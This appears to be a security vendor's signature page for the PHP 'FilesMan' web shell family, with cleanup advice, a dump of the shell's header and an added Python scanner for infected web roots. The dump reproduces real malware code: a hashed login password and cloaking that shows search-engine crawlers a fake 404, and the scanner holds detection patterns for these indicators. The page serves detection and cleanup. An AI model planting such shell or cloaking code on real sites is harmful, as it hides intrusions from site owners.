Malware Signatures


php.backdoor.filesman.002.005

PHP backdoors are malicious server-side scripts. Typical examples are file managers, web shells, tools that bypass the admin login, and single-purpose scripts that let the attacker upload and run further malware. Because the payload is PHP, it is executed on the server when the page is requested; only its output (for example the web shell interface) reaches the browser, never the code itself. It is common for a backdoor to leave no visible trace in the site's pages, so it cannot be found by crawling the infected site from outside. Server-level analysis of the files on disk is required to confirm and clean up this type of infection.

File managers are among the most common backdoor types. They let the attacker browse, edit, download and upload files on the server conveniently from a browser. Most have an easy-to-use graphical interface, so even attackers with little technical skill can work with them effectively. Advanced variants add features such as archive handling (e.g. zip), network tools and command shells.

Affecting

Any PHP-based website, most often reached through outdated WordPress, Joomla, osCommerce, Magento or Drupal installations, or through stolen credentials.

Cleanup

If the backdoor is a standalone file, it can be deleted safely. If the code has been injected into a legitimate file, remove only the injected part and keep the original file. You can also sign up with us and let our team remove the malware for you.

Dump

// Login password for the shell, stored as an md5 hash
$auth_pass = "7e9424bfa12d1f2ad32463ac1a80e407"; # test
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

// Cloaking: search-engine crawlers get a fake 404 so the shell is never indexed
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
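The server-level check that the description above calls for, as an added example that is not part of this signature page or its vendor's scanner: a small Python scanner that walks a web root for the indicators visible in the dump (an md5-style $auth_pass, the 'FilesMan' default action, the search-engine user-agent list and the fake-404 cloaking) and reports whether each hit is a standalone file, which the Cleanup section says can simply be deleted, or code injected into a legitimate file. The sample web root, its files and the "standalone" heuristic (nothing but the PHP open tag precedes the first indicator) are constructed assumptions of this example.

```python
"""Server-side scan for php.backdoor.filesman.002.005-style shells.

Added example, not the signature vendor's scanner. Indicators are taken
from the dumped shell header; sample files and the "standalone" heuristic
are constructed for this example.
"""
import os
import re
import tempfile
from dataclasses import dataclass

# Indicators lifted from the dump: md5-style password hash, FilesMan default
# action, a list of search-engine bot user agents, and the cloaking branch
# that answers those bots with a fake 404 so the shell never gets indexed.
INDICATORS = {
    "auth_pass_md5": re.compile(r'\$auth_pass\s*=\s*["\'][0-9a-f]{32}["\']', re.I),
    "filesman_action": re.compile(r'\$default_action\s*=\s*["\']FilesMan["\']'),
    "bot_ua_list": re.compile(
        r'array\s*\((?:\s*["\'](?:Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler)["\']\s*,?){3,}\s*\)'),
    "bot_cloaking": re.compile(
        r'preg_match\s*\(.*?HTTP_USER_AGENT.*?\)\s*\)\s*\{\s*header\s*\(\s*["\']HTTP/1\.[01] 404',
        re.S),
}
MIN_HITS = 2  # a single indicator (e.g. "FilesMan" in a comment) is not enough


@dataclass
class Finding:
    path: str
    indicators: list
    standalone: bool  # heuristic: only "<?php" precedes the first indicator


def scan_source(src):
    """Return (sorted indicator names, standalone flag) for one PHP source."""
    hits = {name: m.start() for name, rx in INDICATORS.items() if (m := rx.search(src))}
    if len(hits) < MIN_HITS:
        return [], False
    prefix = src[:min(hits.values())]
    standalone = re.fullmatch(r'\s*(<\?php)?\s*', prefix) is not None
    return sorted(hits), standalone


def scan_tree(root):
    """Walk a web root and return Findings keyed by path relative to root."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                names, standalone = scan_source(fh.read())
            if names:
                rel = os.path.relpath(full, root)
                findings[rel] = Finding(rel, names, standalone)
    return findings


# Constructed samples: the dumped header as a standalone dropper, the same
# header appended to a legitimate config file, and a clean file.
SHELL_HEADER = r'''<?php
$auth_pass = "7e9424bfa12d1f2ad32463ac1a80e407"; # test
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
'''
LEGIT_CONFIG = "<?php\ndefine('DB_NAME', 'wp');\ndefine('DB_USER', 'wp');\n"


def build_sample_tree():
    """Create a throwaway web root with the constructed samples; return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    samples = {
        os.path.join("wp-content", "uploads", ".cache.php"): SHELL_HEADER,
        "wp-config.php": LEGIT_CONFIG + "\n" + SHELL_HEADER.replace("<?php\n", "", 1),
        "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, f in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{rel}: {', '.join(f.indicators)} (standalone={f.standalone})")
```

Run against a real web root with scan_tree("/var/www/html"). Requiring two independent indicators keeps a lone "FilesMan" string in a comment or a plugin's bot list from raising an alert, while the standalone flag tells you whether to delete the file or surgically remove an injected block. Attackers re-encode these shells constantly, so treat the regexes as a starting point for this family, not a complete signature.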